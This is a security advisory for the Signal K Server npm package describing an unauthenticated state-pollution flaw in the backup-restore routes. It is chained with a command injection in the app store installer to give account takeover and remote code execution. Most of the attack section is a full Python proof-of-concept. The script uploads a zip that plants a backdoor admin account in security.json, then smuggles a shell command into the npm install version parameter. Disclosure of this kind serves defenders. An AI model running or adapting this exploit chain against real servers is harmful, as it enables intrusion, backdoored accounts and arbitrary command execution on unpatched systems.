PT-2026-6492 · Npm · Signal K Server

Published

2026-01-02

·

Updated

2026-01-02

CVSS v3.1

9.6

Critical

VectorAV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Summary

An unauthenticated attacker can pollute the internal state (restoreFilePath) of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., security.json, package.json), leading to account takeover and Remote Code Execution (RCE).

Details

The vulnerability is caused by the use of a module-level global variable restoreFilePath in src/serverroutes.ts, which is shared across all requests.
Vulnerable Code Analysis:
  1. Global State: restoreFilePath is defined at the top level of the module.
typescript
// src/serverroutes.ts
let restoreFilePath: string
  1. Unauthenticated State Pollution: The /skServer/validateBackup endpoint updates this variable. Crucially, this endpoint lacks authentication middleware, allowing any user to access it.
typescript
app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) => {
 // ... handles file upload ...
 restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path
})
  1. Restore Hijacking: The /skServer/restore endpoint uses the polluted restoreFilePath to perform the restoration.
typescript
app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) => {
 // ...
 const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path
 // ...
})
Exploit Chain:
  1. Pollution: Attacker uploads a malicious zip file to /validateBackup. The server saves it and updates restoreFilePath to point to this malicious file.
  2. Hijacking: When /restore is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker's malicious files.
  3. Backdoor: The attacker overwrites security.json to add a new administrator account.
  4. RCE: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (/skServer/appstore/install/...) to execute arbitrary system commands (e.g., npm install injection).

PoC

Here is a complete Python script to reproduce the full exploit chain.
python
import requests
import zipfile
import io
import json
import time

# Configuration
TARGET URL = "http://localhost:3000"
BACKDOOR USER = "hacker"
BACKDOOR PASS = "hacked1234"

def step1 plant backdoor():
  print("[*] Step 1: Planting Backdoor via State Pollution...")
  
  # 1. Create malicious zip with security.json
  zip buffer = io.BytesIO()
  with zipfile.ZipFile(zip buffer, 'w') as z:
    # Add backdoor admin user
    security config = {
      "users": [{
        "username": BACKDOOR USER,
        "password": BACKDOOR PASS, 
        "permissions": "admin"
      }]
    }
    z.writestr("security.json", json.dumps(security config))
    # Enable security to make the backdoor effective
    z.writestr("settings.json", json.dumps({"security": {"strategy": "./tokensecurity"}}))
  zip buffer.seek(0)

  # 2. Pollute State (Unauthenticated)
  print("  [+] Sending malicious backup to /validateBackup...")
  res = requests.post(f"{TARGET URL}/skServer/validateBackup", 
            files={'file': ('malicious.zip', zip buffer, 'application/zip')})
  if res.status code != 200:
    print("  [-] Failed to pollute state.")
    return False

  # 3. Trigger Restore (Hijacking)
  print("  [+] Triggering restore to overwrite server config...")
  # Note: In a real attack, if /restore is protected, attacker waits for admin to use it.
  # Here we assume we can trigger it or security is currently off.
  res = requests.post(f"{TARGET URL}/skServer/restore", json={"security.json": True, "settings.json": True})
  
  if res.status code in [200, 202]:
    print("  [+] Restore triggered successfully. Backdoor planted.")
    print("  [!] PLEASE RESTART THE SERVER to load the new configuration.")
    return True
  else:
    print(f"  [-] Restore failed: {res.status code} {res.text}")
    return False

def step2 execute rce():
  print("
[*] Step 2: Executing RCE as Backdoor User...")
  
  # 1. Login
  session = requests.Session()
  login payload = {"username": BACKDOOR USER, "password": BACKDOOR PASS}
  res = session.post(f"{TARGET URL}/signalk/v1/auth/login", json=login payload)
  
  if res.status code != 200:
    print("  [-] Login failed. Did you restart the server?")
    return
  
  token = res.json()['token']
  print("  [+] Login successful. Authenticated as Admin.")

  # 2. RCE Payload (Windows Example)
  # Injecting command into version parameter of npm install
  # Command: echo RCE SUCCESS > rce proof.txt
  cmd payload = "1.0.0 & echo RCE SUCCESS > rce proof.txt &"
  
  # We need a valid package name to bypass existence check
  package name = "@signalk/freeboard-sk" 
  
  print(f"  [+] Sending RCE payload: {cmd payload}")
  headers = {'Authorization': f'Bearer {token}'}
  try:
    session.post(f"{TARGET URL}/skServer/appstore/install/{package name}/{cmd payload}", 
           headers=headers, timeout=5)
  except:
    pass # Timeout is expected as the command might hang or take time

  print("  [+] Payload sent. Check for 'rce proof.txt' in server root.")

if  name  == " main ":
  # Run Step 1, then restart server manually, then Run Step 2
  # step1 plant backdoor()
  step2 execute rce()

Impact

Remote Code Execution (RCE), Account Takeover, Denial of Service. Verified: RCE is demonstrated by creating a file named rce proof.txt containing the text "RCE SUCCESS" on the server filesystem using the exploit chain.

Fix

OS Command Injection

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-913CWE-78

Related Identifiers

GHSA-W3X5-7C4C-66P9

Affected Products

Signal K Server